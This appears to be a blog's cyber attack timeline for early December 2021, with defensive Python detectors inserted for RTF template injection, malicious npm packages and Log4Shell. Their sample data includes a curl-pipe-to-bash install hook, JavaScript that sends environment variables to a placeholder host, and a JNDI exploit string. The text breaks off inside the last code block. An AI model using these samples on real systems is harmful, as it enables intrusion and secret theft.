Let’s start the new infosec year with the first cyber attacks timeline of December 2021. In this timeline I have collected 123 events, with a daily average number of 8.2 events, a sharp increase compared to the 100 events collected in the previous timeline (corresponding to a daily average number of 6.67 events/day). Ransomware continues to dominate the threat landscape with a percentage of events directly or indirectly characterized by this attack vector corresponding to 23.6% (29 out of 123 events), very close to the value of the previous timeline (22%).
Another constant trend is the impact of vulnerabilities, which characterized 14 out of 123 events (11.4%, again very close to the 10.4% of the previous timeline). December 2021 will be remembered in the annals of cybersecurity for the severe Log4Shell vulnerability (CVE-2021-44228) in the Apache Log4j library; additionally, threat actors are continuing to exploit vulnerabilities in Zoho's products.
The first half of December has also seen a new rise in the number of attacks targeting fintech startups: four entities have been severely hit, for a total loss of nearly $380 million.
Threat actors motivated by cyber espionage remain particularly active, above all Nobelium, the group behind the massive SolarWinds supply-chain attack, which is still targeting cloud and managed service providers and is also behind a new campaign against French organizations. Other state-sponsored actors active in this period include Charming Kitten, APT27, and StrongPity. Newly discovered threat actors were also seen using innovative attack techniques such as RTF template injection. At least one threat actor, Nickel, suffered a blow when dozens of its malicious domains were seized by Microsoft.
Last but not least, another interesting element of this timeline is the discovery of several operations using fake social media accounts to manipulate public opinion (coordinated inauthentic behavior).
Enjoy the interactive timeline, and thanks for sharing it and supporting my work in spreading risk awareness across the community. Also, don't forget to follow @paulsparrows on Twitter, or even connect on LinkedIn, for the latest updates.
ID
Date Reported
Date Occurred
Date Discovered
Author
Target
Description
Attack
Target Class
Attack Class
Country
Link
Tags
1
01/12/2021
During Q2 and Q3 2021
During Q2 and Q3 2021
APT Actor from China
Multiple organizations
Researchers from Proofpoint reveal that APT actors from China are now using a novel technique called RTF template injection.
Targeted Attack
Multiple Industries
CE
N/A
Proofpoint, China, RTF template injection
2
01/12/2021
During Q2 and Q3 2021
During Q2 and Q3 2021
APT Actor from Russia
Multiple organizations
Researchers from Proofpoint reveal that APT actors from Russia are now using a novel technique called RTF template injection.
Targeted Attack
Multiple Industries
CE
N/A
Proofpoint, Russia, RTF template injection
3
01/12/2021
During Q2 and Q3 2021
During Q2 and Q3 2021
APT Actor from India
Multiple organizations
Researchers from Proofpoint reveal that APT actors from India are now using a novel technique called RTF template injection.
Targeted Attack
Multiple Industries
CE
N/A
Proofpoint, India, RTF template injection
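The three Proofpoint entries above all refer to RTF template injection: the `\*\template` control word, which is meant to reference a document template, is pointed at a URL, so Word fetches and runs a remote payload when the file is opened, and the URL is sometimes hidden behind RTF hex escapes so that a plain string search for "http" finds nothing. The following Python triage script is an added example, not code from Proofpoint or from this page: it decodes the template destination (hex escapes, escaped backslashes, stray control words) and flags any that is remote, including UNC paths, which trigger an SMB connection. The three sample documents are constructed and carry no payload; `example.invalid` and the 198.51.100.0/24 address are placeholders.

```python
import re

# Constructed sample documents (no real payloads): a benign RTF, one whose
# \*\template destination is a remote URL, and one where that URL is hidden
# behind RTF hex escapes (\'xx). example.invalid is a placeholder host.
BENIGN_RTF = rb"{\rtf1\ansi{\fonttbl{\f0 Times New Roman;}}\f0 Quarterly report\par}"
INJECTED_RTF = (
    rb"{\rtf1\ansi{\*\template http://example.invalid/payload.dotm}"
    rb"{\fonttbl{\f0 Times New Roman;}}\f0 Quarterly report\par}"
)
HEX_OBFUSCATED_RTF = (
    rb"{\rtf1\ansi{\*\template \'68\'74\'74\'70://example.invalid/t.dotm}"
    rb"{\fonttbl{\f0 Times New Roman;}}\f0 Quarterly report\par}"
)

# {\*\template <destination>} ; the destination runs to the first closing brace
TEMPLATE_RE = re.compile(rb"\{\\\*\\template\s*([^}]*)\}", re.IGNORECASE)
# One RTF token: \'xx hex escape | escaped literal \\ \{ \} | any other control word
RTF_TOKEN_RE = re.compile(rb"\\'([0-9a-fA-F]{2})|\\([\\{}])|\\[a-zA-Z]+-?\d*\s?")
# A legitimate template lives on the local machine; any of these means a
# network fetch at open time (a UNC path triggers an SMB connection).
REMOTE_PREFIXES = (b"http://", b"https://", b"file://", b"\\\\")


def _decode_token(m: re.Match) -> bytes:
    if m.group(1):                      # \'xx -> the byte it encodes
        return bytes.fromhex(m.group(1).decode())
    if m.group(2):                      # \\ \{ \} -> the literal character
        return m.group(2)
    return b""                          # other control words carry no text


def decode_rtf_text(raw: bytes) -> bytes:
    """Turn the raw destination text of an RTF group into plain text."""
    return RTF_TOKEN_RE.sub(_decode_token, raw).strip()


def find_remote_templates(rtf: bytes) -> list[str]:
    """Return every \\*\\template destination that points at a remote location.
    An empty list means the file carries no remote template reference."""
    hits = []
    for m in TEMPLATE_RE.finditer(rtf):
        dest = decode_rtf_text(m.group(1))
        if dest.lower().startswith(REMOTE_PREFIXES):
            hits.append(dest.decode("latin-1"))
    return hits


def scan_files(files: dict[str, bytes]) -> dict[str, list[str]]:
    """Map file name -> remote template destinations, keeping only the hits.
    Files are passed as bytes so the check also works on mail attachments."""
    return {name: hits for name, data in files.items() if (hits := find_remote_templates(data))}


if __name__ == "__main__":
    samples = {"benign.rtf": BENIGN_RTF, "invoice.rtf": INJECTED_RTF, "cv.rtf": HEX_OBFUSCATED_RTF}
    for name, dests in scan_files(samples).items():
        print(f"{name}: remote template -> {', '.join(dests)}")
```

The check is deliberately narrow: a remote template reference has essentially no legitimate use in a document received by mail, so a hit is worth quarantining on its own, while the absence of a hit says nothing about other RTF tricks (OLE objects, equation editor exploits) that need their own rules.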
4
01/12/2021
Between 9/10/2021 and 17/10/2021
17/10/2021
?
Planned Parenthood Los Angeles
Planned Parenthood Los Angeles discloses a data breach after suffering a ransomware attack in October that exposed the personal information of approximately 400,000 patients.
Malware
Human health and social work
CC
US
Planned Parenthood Los Angeles, ransomware
5
01/12/2021
At least since 25/11/2021
25/11/2021
?
Customers of eight Malaysian banks
Researchers from Cyble discover a fake Android app masquerading as a housekeeping service to steal online banking credentials from the customers of eight Malaysian banks.
Malware
Finance and insurance
CC
MY
Cyble, Android
6
01/12/2021
-
-
Emotet
Multiple organizations
The Emotet malware is now distributed through malicious Windows App Installer packages that pretend to be Adobe PDF software.
Malware
Multiple Industries
CC
>1
Emotet, PDF
7
01/12/2021
-
-
?
Online stores
Researchers from Sansec discover NginRAT, a remote access malware that hides on Nginx servers in a way that makes it virtually invisible to security solutions.
Malicious Script Injection
Wholesale and retail
CC
>1
Sansec, NginRAT, Nginx
8
01/12/2021
-
11/10/2021
?
Cox Communications
Cox Communications discloses a data breach after a hacker impersonated a support agent to gain access to customers' personal information.
Account Takeover
Information and communication
CC
US
Cox Communications
9
01/12/2021
During the last few months
-
?
Mobile devices of Iranian citizens
Researchers from Check Point uncover a hacking campaign that involves cyberattackers impersonating Iranian government bodies to infect the mobile devices of Iranian citizens through SMS messages.
Account Takeover
Individual
CC
IR
Check Point, Iran
10
01/12/2021
During 2021
During October 2021
V_V (anti-vaccination conspiracy movement)
Facebook users in Italy and France
Meta removes a network of accounts that originated in Italy and France and targeted medical professionals, journalists, and elected officials with mass harassment.
Fake Social Accounts
Individual
CC
IT
FR
V_V, Meta, Facebook
11
01/12/2021
During 2021
During October 2021
?
Activists in Vietnam
Meta removes a network of accounts that originated in Vietnam for mass reporting against activists and other people who publicly criticized the Vietnamese government.
Fake Social Accounts
Individual
N/A
VN
Meta, Facebook, Vietnam
12
01/12/2021
During 2021
During November 2021
?
Facebook users in multiple countries
Meta removes 110 Facebook accounts, 78 Pages, 13 Groups and 17 Instagram accounts from Palestine for coordinated inauthentic behavior.
Fake Social Accounts
Individual
CW
>1
Meta, Facebook, Palestine
13
01/12/2021
During 2021
During November 2021
?
Facebook users in multiple countries
Meta removes 31 Facebook accounts, four Groups, two Facebook Events and four Instagram accounts from Poland for coordinated inauthentic behavior.
Fake Social Accounts
Individual
CW
>1
Meta, Facebook, Poland
14
01/12/2021
During 2021
During October 2021
?
Facebook users in multiple countries
Meta removes 38 Facebook accounts, five Groups, and four Instagram accounts in Belarus for coordinated inauthentic behavior.
Fake Social Accounts
Individual
CW
>1
Meta, Facebook, Belarus
15
01/12/2021
During 2021
During October 2021
?
Facebook users in multiple countries
Meta removes 595 Facebook accounts, 21 Pages, four Groups and 86 accounts on Instagram from China for coordinated inauthentic behavior.
Fake Social Accounts
Individual
CW
>1
Meta, Facebook, China
16
01/12/2021
28/09/2021
11/10/2021
?
Great Plains Manufacturing
Great Plains Manufacturing notifies 4,110 employees that some of their protected health information has potentially been compromised in a cyberattack that was discovered on October 11, 2021.
Unknown
Manufacturing
CC
US
Great Plains Manufacturing
17
01/12/2021
30/11/2021
30/11/2021
?
MonoX Finance
Blockchain startup MonoX Finance discloses that a hacker stole $31 million by exploiting a bug in software the service uses to draft smart contracts.
Vulnerability
Fintech
CC
N/A
MonoX Finance
18
02/12/2021
During the last three months
-
APT27 AKA Emissary Panda
Multiple organizations
Researchers from Palo Alto Networks discover that an APT is exploiting CVE-2021-44077, an unauthenticated remote code execution issue in Zoho ServiceDesk Plus versions 11305 and older.
CVE-2021-44077 Vulnerability
Multiple Industries
CE
>1
Palo Alto Networks, APT27, Emissary Panda, CVE-2021-44077, Zoho ServiceDesk Plus
19
02/12/2021
-
-
Government of Mexico
Twitter users
Twitter removes a network of 276 inauthentic accounts that shared primarily civic content, in support of government initiatives related to public health and political parties.
Fake Social Accounts
Individual
N/A
MX
Twitter, Mexico
20
02/12/2021
-
-
People’s Republic of China
Twitter users
Twitter removes a network of 2,048 accounts that amplified Chinese Communist Party narratives related to the treatment of the Uyghur population in Xinjiang.
Fake Social Accounts
Individual
N/A
CN
Twitter, China, Uyghur
21
02/12/2021
-
-
People’s Republic of China
Twitter users
Twitter removes a network of 112 accounts connected to “Changyu Culture,” a private company backed by the Xinjiang regional government.
Fake Social Accounts
Individual
N/A
CN
Twitter, China, Changyu Culture
22
02/12/2021
-
-
IRA (Internet Research Agency)
Twitter users in the Central African Republic
Twitter removes a network of 16 accounts linked to the IRA that attempted an information operation in the Central African Republic.
Fake Social Accounts
Public admin and defence, social security
CW
CF
Twitter, IRA Internet Research Agency, Central African Republic, Russia
23
02/12/2021
-
-
IRA (Internet Research Agency)
Twitter users
Twitter removes a network of 50 accounts that attacked the civilian Libyan government and actors that support it, while voicing significant support for Russia’s geopolitical position in Libya and Syria.
Fake Social Accounts
Individual
CW
LY
SY
Twitter, IRA Internet Research Agency, Libya, Syria, Russia
24
02/12/2021
-
-
Tanzania
Twitter users
Twitter removes a network of 268 accounts utilized to file bad faith reports on Twitter, targeting members and supporters of FichuaTanzania and its founder.
Fake Social Accounts
Individual
N/A
TZ
Twitter, Tanzania, FichuaTanzania
25
02/12/2021
-
-
Uganda
Twitter users
Twitter removes a network of 418 accounts engaged in coordinated inauthentic activity in support of Ugandan presidential incumbent Museveni and his party, National Resistance Movement (NRM).
Fake Social Accounts
Individual
N/A
UG
Twitter, Museveni, National Resistance Movement, NRM
26
02/12/2021
-
-
Venezuela
Twitter users
Twitter removes a network of 277 Venezuelan accounts that amplified accounts, hashtags, and topics in support of the government and its official narratives via an app called Twitter Patria.
Fake Social Accounts
Individual
N/A
VE
Twitter, Venezuela, Twitter Patria
27
02/12/2021
Since at least November 2019
-
Cuba
At least 49 organizations from US critical infrastructure sectors.
The Federal Bureau of Investigation (FBI) reveals that the Cuba ransomware gang has compromised the networks of at least 49 organizations from US critical infrastructure sectors.
Malware
Electricity, gas steam, air conditioning
CC
US
Federal Bureau of Investigation, FBI, Cuba, ransomware
28
02/12/2021
Early December 2021
Early December 2021
?
Microsoft 365 users
Researchers from MailGuard discover a persuasive and ongoing series of phishing attacks using fake Office 365 notifications that ask recipients to review blocked spam messages, in order to steal their Microsoft credentials.
Account Takeover
Multiple Industries
CC
>1
Mailguard, Office 365
29
02/12/2021
-
-
?
Badger
Hackers steal an estimated $120 million worth of Bitcoin and Ether assets from Badger, a decentralized finance (DeFi) platform.
Unknown
Fintech
CC
N/A
Badger
30
02/12/2021
Since at least 2018
-
Magnat
Victims in Canada, the United States, Europe, Australia and Nigeria.
Researchers from Cisco Talos reveal the details of Magnat, a campaign distributing fake versions of popular software to trick users into downloading three forms of malware.
Malvertising
Individual
CC
>1
Cisco Talos, Magnat
31
02/12/2021
Over the past few months
-
Tor2Mine
Multiple organizations
Researchers from Sophos discover a new variant of the Tor2Mine miner using a PowerShell script that attempts to disable malware protection, execute a miner payload and harvest Windows credentials.
Malware
Multiple Industries
CC
>1
Sophos, Tor2Mine
32
02/12/2021
Until November 2021
-
Cuba
At least 49 entities in five critical sectors in the U.S.
The FBI warns that the Cuba ransomware gang has compromised at least 49 entities in five critical sectors in the U.S. as of November.
Malware
Multiple Industries
CC
US
FBI, Cuba, Ransomware
33
02/12/2021
"Recently"
-
?
Members of the United States military and their families
Researchers at Lookout identify a phishing campaign targeting members of the United States military and their families.
Account Takeover
Public admin and defence, social security
CC
US
Lookout
34
03/12/2021
-
-
?
Vulnerable Zoho systems
Business software provider Zoho urges customers to update their Desktop Central and Desktop Central MSP installations to the latest available version after a critical vulnerability (tracked as CVE-2021-44515) is exploited in the wild.
CVE-2021-44515 vulnerability
Multiple Industries
CC
>1
Zoho, Desktop Central, Desktop Central MSP, CVE-2021-44515
35
03/12/2021
During the last few months
-
?
At least nine U.S. State Department employees
The iPhones of at least nine U.S. State Department employees are hacked by an unknown attacker using the Pegasus spyware developed by the Israel-based NSO Group.
Targeted Attack
Public admin and defence, social security
CE
US
U.S. State Department, NSO Pegasus
36
03/12/2021
During June 2021
-
BRATA
Android Banking users in Italy
Researchers from Cleafy discover a campaign in Italy exploiting the BRATA Android remote access trojan (RAT), with threat actors calling victims of SMS attacks to steal their online banking credentials.
Malware
Finance and insurance
CC
IT
Cleafy, BRATA, Android
37
03/12/2021
10/12/2020
-
?
Bansley and Kiener LLP
Accountancy firm Bansley and Kiener LLP announces it was the victim of a December 2020 ransomware attack.
Malware
Administration and support service
CC
US
Bansley and Kiener LLP, ransomware
38
03/12/2021
3/12/2021
3/12/2021
?
Riverhead Central School District
Riverhead Central School District is hit with a ransomware attack.
Malware
Education
CC
US
Riverhead Central School District, ransomware
39
03/12/2021
3/12/2021
3/12/2021
?
Ulss 6 Euganea
Ulss 6 Euganea (an Italian local health authority) is hit with a cyber attack.
Unknown
Human health and social work
CC
IT
Ulss 6 Euganea
40
03/12/2021
Five months ago
-
?
Hisar Health Department
At least 18 fake birth certificates are generated in Hisar, after the Health Department is hacked.
Account Takeover
Public admin and defence, social security
CC
IN
Hisar Health Department
41
04/12/2021
4/12/2021
4/12/2021
?
BitMart
Cryptocurrency exchange BitMart reveals that it was hacked for $150 million.
Account Takeover
Fintech
CC
KY
BitMart
42
04/12/2021
-
-
?
Cryptocurrency users
Researchers from Red Canary reveal that threat actors are distributing altered KMSpico installers to infect Windows devices with malware that steals cryptocurrency wallets.
Malware
Fintech
CC
>1
Red Canary, KMSpico
43
04/12/2021
Since early December
2/12/2021
?
Verified Twitter accounts
A new phishing campaign targets verified Twitter accounts.
Account Takeover
Individual
CC
>1
Twitter
44
05/12/2021
-
-
RedLine
Multiple organizations
Cybercriminals are spamming website contact forms and discussion forums to distribute Excel XLL files that download and install the RedLine password and information-stealing malware.
Malware
Multiple Industries
CC
>1
RedLine
45
05/12/2021
4/12/2021
4/12/2021
?
SPAR
Approximately 330 SPAR shops in northern England face severe operational problems following a weekend cyberattack, forcing many stores to close or switch to cash-only payments.
Unknown
Wholesale and retail
CC
UK
SPAR
46
05/12/2021
5/12/2021
5/12/2021
?
Maryland’s health department
A cyberattack takes Maryland’s health department offline.
Unknown
Human health and social work
CC
US
Maryland’s health department
47
06/12/2021
Since 2020
-
Nobelium
Cloud providers and MSPs
Researchers from Mandiant reveal that the Nobelium hacking group continues to breach government and enterprise networks worldwide by targeting their cloud and managed service providers and using a new custom "Ceeloader" malware.
Targeted Attack
Professional, scientific and technical
CE
>1
Mandiant, Nobelium, Ceeloader
48
06/12/2021
Since February 2021
-
Nobelium
French organizations
The French national cyber-security agency ANSSI (Agence Nationale de la Sécurité des Systèmes d'Information) says that the Russian-backed Nobelium hacking group has been targeting French organizations since February 2021.
Targeted Attack
Multiple Industries
CE
FR
ANSSI, Agence Nationale de la Sécurité des Systèmes d'Information, Nobelium
49
06/12/2021
Since at least 2019
-
Nickel (AKA KE3CHANG, APT15, Vixen Panda, Royal APT, and Playful Dragon)
Multiple organizations
Microsoft seizes dozens of malicious sites used by the Nickel China-based hacking group to target organizations in the US and 28 other countries worldwide.
Targeted Attack
Multiple Industries
CE
>1
Microsoft, Nickel, KE3CHANG, APT15, Vixen Panda, Royal APT, Playful Dragon
50
06/12/2021
2/12/2021
2/12/2021
Conti
Nordic Choice Hotels
Nordic Choice Hotels confirms a cyber attack on its systems from the Conti ransomware group.
Malware
Accommodation and food service
CC
NO
Nordic Choice Hotels, Conti, ransomware
51
06/12/2021
-
-
?
Multiple organizations
Researchers from Sucuri reveal that threat actors are injecting credit card swipers into random plugins of e-commerce WordPress sites.
Malicious Script Injection
Multiple Industries
CC
>1
Sucuri, WordPress
52
06/12/2021
-
-
Moobot
Vulnerable Hikvision products
Researchers from Fortinet reveal that a Mirai-based botnet called 'Moobot' is spreading aggressively by exploiting a critical command injection flaw (CVE-2021-36260) in the web server of many Hikvision products.
CVE-2021-36260 vulnerability
Multiple Industries
CC
>1
Fortinet, Moobot, Hikvision
53
06/12/2021
Since March 2021
-
?
More than 300 e-commerce stores
Researchers from Gemini Advisory reveal that threat actors have abused a legitimate feature of the Google Tag Manager service to secretly add and deploy malicious JavaScript code to more than 300 e-commerce stores since March this year.
Malicious Script Injection
Wholesale and retail
CC
>1
Gemini Advisory, Google Tag Manager
54
06/12/2021
11/7/2021
21/10/2021
HelloKitty
Oregon Anesthesiology Group (OAG)
The Oregon Anesthesiology Group (OAG) discloses that it suffered a ransomware attack in July that led to the breach of the personal information of 750,000 patients and 522 current and former OAG employees.
Malware
Human health and social work
CC
US
Oregon Anesthesiology Group, OAG, HelloKitty, ransomware
55
07/12/2021
-
-
Glupteba
More than 1 million Windows PCs worldwide
Google announces that it has taken action to disrupt the Glupteba botnet, which controls more than 1 million Windows PCs around the world and grows by thousands of newly infected devices each day.
Malware
Multiple Industries
CC
>1
Google, Glupteba
56
07/12/2021
-
-
?
Misconfigured QNAP Devices
QNAP warns customers of ongoing attacks targeting their NAS devices with the oom_reaper cryptomining malware, urging them to take protective measures immediately.
Misconfiguration
Multiple Industries
CC
>1
QNAP, crypto, oom_reaper
57
07/12/2021
Since early December 2021
Early December 2021
Cerber
Vulnerable Confluence and GitLab servers
The Cerber ransomware is back as a new ransomware family with the old name, targeting Atlassian Confluence and GitLab servers through remote code execution vulnerabilities (CVE-2021-26084 and CVE-2021-22205 respectively).
Malware
Multiple Industries
CC
>1
Cerber, ransomware, Confluence, GitLab
58
07/12/2021
Since October 2021
-
Multiple threat actors
US Universities
Researchers from Proofpoint reveal that US universities are being targeted in multiple phishing attacks, using COVID-19 Omicron lures, designed to impersonate college login portals to steal valuable Office 365 credentials.
Account Takeover
Education
CC
US
Proofpoint, US universities, Office 365, COVID-19, Omicron
59
07/12/2021
Over the last eight years
During 2020 and 2021
XE Group
Multiple organizations
Researchers from Volexity reveal the details of XE Group, a Vietnamese-origin criminal threat actor linked to eight years of for-profit hacking and credit card skimming.
Malicious Script Injection
Multiple Industries
CC
>1
Volexity, XE Group, Vietnam
60
07/12/2021
7/12/2021
7/12/2021
Emotet
Multiple organizations
The Emotet malware starts to install Cobalt Strike beacons directly, giving immediate network access to threat actors and facilitating ransomware attacks.
Malware
Multiple Industries
CC
>1
Emotet, Cobalt Strike
61
07/12/2021
18/07/2021 and 18/09/2021
-
?
Sound Generations
Sound Generations announces that unauthorized individuals have gained access to its internal systems and have used ransomware to encrypt files in two separate attacks.
Malware
Human health and social work
CC
US
Sound Generations
62
07/12/2021
1/6/2021
Between 25/05/2021 and 01/06/2021
?
Saltzer Health
Saltzer Health discloses that it suffered a phishing attack.
Account Takeover
Human health and social work
CC
US
Saltzer Health
63
07/12/2021
21/9/2021
-
?
Boulder Neurosurgical and Spine Associates
Boulder Neurosurgical and Spine Associates discloses that it suffered a phishing attack.
Account Takeover
Human health and social work
CC
US
Boulder Neurosurgical and Spine Associates
64
07/12/2021
30/9/2021
-
?
Region IV Area Agency on Aging
Region IV Area Agency on Aging discloses that it suffered a phishing attack.
Account Takeover
Human health and social work
CC
US
Region IV Area Agency on Aging
65
07/12/2021
Since September 2021
-
?
Individuals
Scammers are using fake job listings from multiple game studios including Riot Games to empty the wallets of young, hopeful victims looking to break into the gaming industry.
Fake job listings
Individual
CC
>1
Riot Games
66
07/12/2021
6/12/2021
6/12/2021
?
Pellissippi State Community College
Pellissippi State Community College discloses a ransomware attack.
Malware
Education
CC
US
Pellissippi State Community College, ransomware
67
07/12/2021
7/12/2021
7/12/2021
?
Eldon School District
Eldon School District is hit with a ransomware attack.
Malware
Education
CC
US
Eldon School District
68
08/12/2021
-
During the first week of December
Dark Mirai
Vulnerable TP-Link Routers
Researchers from Fortinet discover that the botnet known as Dark Mirai (AKA MANGA, Dark.IoT) is exploiting a new vulnerability on the TP-Link TL-WR840N EU V5, a popular inexpensive home router released in 2017.
CVE-2021-41653 vulnerability
Multiple Industries
CC
>1
Fortinet, Dark Mirai, MANGA, Dark.IoT, TP-Link, TL-WR840N EU V5, CVE-2021-41653
69
08/12/2021
-
During the first week of December 2021
?
Multiple organizations
Researchers from JFrog discover 17 more malicious npm packages that steal Discord tokens and environment variables.
Malware
Multiple Industries
CC
>1
JFrog, npm, Discord
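Packages like the ones in the entry above usually run their payload from an npm lifecycle hook (`preinstall`, `install`, `postinstall`) at `npm install` time, before a developer ever imports the module, and the payload itself is often nothing more than "serialize `process.env` and POST it somewhere". A quick audit of the manifest and the package source before installation therefore catches a good share of them. The Python script below is an added example, not code from JFrog or from this page: it flags lifecycle scripts that use inline `node -e` evaluation, downloaders, pipes into a shell, child-process spawning, secret-related strings or encoding tricks, and checks a JavaScript file for the read-environment-then-send pattern. The manifests and JavaScript snippets are constructed; `example.invalid` is a placeholder host.

```python
import json
import re

# Constructed manifests and source (not real packages). example.invalid is a
# placeholder host.
BENIGN_MANIFEST = json.dumps({
    "name": "left-pad-ish",
    "version": "1.0.0",
    "scripts": {"test": "node test.js", "build": "tsc -p ."},
})
SUSPICIOUS_MANIFEST = json.dumps({
    "name": "discord-lofy-utils",
    "version": "0.0.3",
    "scripts": {
        "postinstall": "node -e \"require('child_process').exec('curl -s http://example.invalid/i | bash')\"",
        "test": "echo ok",
    },
})
SUSPICIOUS_INDEX_JS = """
const https = require('https');
const body = JSON.stringify(process.env);              // harvest every env var
const req = https.request({hostname: 'example.invalid', method: 'POST', path: '/c'});
req.end(body);
"""
BENIGN_INDEX_JS = "module.exports = (s, n) => String(s).padStart(n);"

# Hooks npm runs automatically during `npm install`, before any code is imported.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare", "preuninstall", "postuninstall")
# Patterns that rarely belong in a library's install hook.
RISKY_TOKENS = {
    "inline_eval": re.compile(r"\bnode\s+(?:-e|--eval)\b"),
    "downloader": re.compile(r"\b(?:curl|wget|Invoke-WebRequest|iwr)\b", re.IGNORECASE),
    "shell_pipe": re.compile(r"\|\s*(?:ba|z)?sh\b"),
    "child_process": re.compile(r"child_process|\bexec\(|\bspawn\("),
    "secrets": re.compile(r"process\.env|discord|token|leveldb|\.ldb\b", re.IGNORECASE),
    "encoded": re.compile(r"base64|fromCharCode|\beval\(", re.IGNORECASE),
}
READS_ENV_RE = re.compile(r"process\.env")
SENDS_DATA_RE = re.compile(r"require\(['\"](?:https?|net|dgram|dns)['\"]\)|\bfetch\(|XMLHttpRequest|axios")


def audit_manifest(manifest_json: str) -> dict:
    """Return {hook: [matched rules]} for each lifecycle script that looks risky.
    An empty dict means no lifecycle hook tripped a rule."""
    scripts = json.loads(manifest_json).get("scripts") or {}
    findings = {}
    for hook in LIFECYCLE_HOOKS:
        command = scripts.get(hook)
        if not command:
            continue
        reasons = [name for name, rx in RISKY_TOKENS.items() if rx.search(command)]
        if reasons:
            findings[hook] = reasons
    return findings


def reads_env_and_sends(js_source: str) -> bool:
    """True when a JavaScript file both reads process.env and pulls in a way to
    send data out, the minimal shape of an environment-variable stealer."""
    return bool(READS_ENV_RE.search(js_source) and SENDS_DATA_RE.search(js_source))


if __name__ == "__main__":
    for label, manifest in (("benign", BENIGN_MANIFEST), ("suspicious", SUSPICIOUS_MANIFEST)):
        print(label, audit_manifest(manifest) or "no risky lifecycle hooks")
    print("index.js exfiltration pattern:", reads_env_and_sends(SUSPICIOUS_INDEX_JS))
```

Run it against the extracted tarball of a dependency before adding it, or wire it into CI; `npm install --ignore-scripts` is the complementary control, since it stops lifecycle hooks from running at all while the package is inspected.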
70
08/12/2021
During 2021
-
TAG-16
Several high-profile military and government organizations across Southeast Asia
Researchers from Recorded Future's Insikt Group reveal the details of TAG-16, a Chinese state-sponsored group which has compromised several high-profile military and government organizations across Southeast Asia throughout 2021 using custom malware families such as FunnyDream and Chinoxy.
Targeted Attack
Public admin and defence, social security
CE
>1
Recorded Future, Insikt Group, TAG-16, FunnyDream, Chinoxy, China
71
08/12/2021
During 2021
-
Suspected Chinese state-sponsored
Entities in Cambodia
Researchers from Recorded Future's Insikt Group discover a campaign carried out by a Chinese state-sponsored group targeting entities in Cambodia, including the Sihanoukville Autonomous Port (PAS).
Targeted Attack
Multiple Industries
CE
KH
Recorded Future, Insikt Group, Cambodia, China, Sihanoukville Autonomous Port, PAS
72
08/12/2021
During 2021
-
Suspected Chinese state-sponsored
Entities in Laos
Researchers from Recorded Future's Insikt Group discover a campaign carried out by a Chinese state-sponsored group targeting entities in Laos, including the National Committee for Special Economic Zones (SEZs) and the National Enterprise Database (NED).
Targeted Attack
Multiple Industries
CE
LA
Recorded Future, Insikt Group, Laos, China, National Committee for Special Economic Zones, SEZs, National Enterprise Database, NED
73
08/12/2021
25/7/2021
25/7/2021
?
Atalanta
North American food importer Atalanta admits that it suffered a data breach involving employees’ personal information as the result of a ransomware attack.
Malware
Accommodation and food service
CC
US
Atalanta
74
08/12/2021
-
15/9/2021
?
Valley Mountain Regional Center
Valley Mountain Regional Center notifies 17,197 patients that some of their protected health information was stored in email accounts that were accessed by unauthorized individuals.
Account Takeover
Human health and social work
CC
US
Valley Mountain Regional Center
75
09/12/2021
-
30/11/2021
StrongPity AKA APT-C-41 and PROMETHIUM
Multiple targets
Researchers from Minerva Labs reveal the details of the latest StrongPity APT campaign, which uses a malicious version of the popular Notepad++ application.
Targeted Attack
Multiple Industries
CE
>1
Minerva Labs, StrongPity, APT-C-41, PROMETHIUM, Notepad++
76
09/12/2021
-
-
ALPHV (AKA BlackCat)
Multiple organizations
Security researchers discover ALPHV (AKA BlackCat), a new ransomware family written in Rust.
Malware
Multiple Industries
CC
>1
ALPHV, BlackCat, ransomware, Rust
77
09/12/2021
During the last two days
-
?
Vulnerable WordPress sites
Researchers from Wordfence detect a massive wave of attacks over the last couple of days, originating from 16,000 IPs and targeting over 1.6 million WordPress sites through four WordPress plugins (PublishPress Capabilities, Kiwi Social Plugin, Pinterest Automatic, WordPress Automatic) and fifteen Epsilon Framework themes.
Vulnerability
Multiple Industries
CC
>1
Wordfence, WordPress, PublishPress Capabilities, Kiwi Social Plugin, Pinterest Automatic, WordPress Automatic, Epsilon Framework
78
09/12/2021
-
-
?
German e-banking users
Researchers from Cofense discover a new phishing campaign targeting German e-banking users that uses QR codes in the credential-snatching process.
Account Takeover
Finance and insurance
CC
DE
Cofense, QR codes
79
09/12/2021
During December 2021
During December 2021
?
Microsoft 365 users
Researchers from Avanan discover a phishing campaign taking advantage of the Outlook productivity features to make the spoofed message more credible.
Account Takeover
Multiple Industries
CC
>1
Avanan, Microsoft Outlook
80
09/12/2021
9/12/2021
9/12/2021
?
Oahu Transit Services
Oahu Transit Services, a transport operator in Hawaii is hit with a possible ransomware attack.
Malware
Transportation and storage
CC
US
Oahu Transit Services, ransomware
81
09/12/2021
9/12/2021
9/12/2021
?
Municipality of Nowiny
The Municipality of Nowiny is hit with a ransomware attack.
Malware
Public admin and defence, social security
CC
PL
Municipality of Nowiny, ransomware
82
10/12/2021
-
-
Snatch
Volvo Cars
Swedish carmaker Volvo Cars discloses that attackers have stolen research and development information after hacking some of its servers.
Unknown
Manufacturing
CC
SE
Volvo Cars, Snatch
83
10/12/2021
10/12/2021
10/12/2021
Multiple threat actors
Vulnerable Apache Log4j servers
Threat actors start mass scanning for servers running vulnerable versions of Apache Log4j after the severe Log4Shell vulnerability is disclosed.
CVE-2021-44228 Vulnerability
Multiple Industries
CC
>1
Apache Log4j, CVE-2021-44228, Log4Shell
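The scanning wave in the entry above worked by placing a `${jndi:...}` lookup in any request field a Java application might log (User-Agent, query parameters, arbitrary headers), and within hours attackers moved to nested lookups such as `${${lower:j}ndi:...}` and `${${::-j}ndi:...}` to slip past string matches on the literal "jndi". The Python detector below is an added example, not code from this page or any vendor: it URL-decodes each log line and resolves the `lower:`, `upper:` and `name:-default` lookup forms (documented Log4j 2 lookup syntax) from the inside out until nothing changes, so the obfuscated variants collapse to the plain one before the final match. The access-log lines, addresses and hostnames are constructed (RFC 5737 documentation ranges). This is a triage aid for finding who probed you and from where; patching Log4j remains the fix.

```python
import re
from urllib.parse import unquote

# Constructed Apache-style access log (not from any real server): one clean
# request followed by exploitation attempts in plain, URL-encoded and
# nested-lookup form. Addresses are documentation ranges (RFC 5737).
SAMPLE_LOG = r"""
203.0.113.5 - - [10/Dec/2021:14:02:11 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Dec/2021:14:03:45 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"
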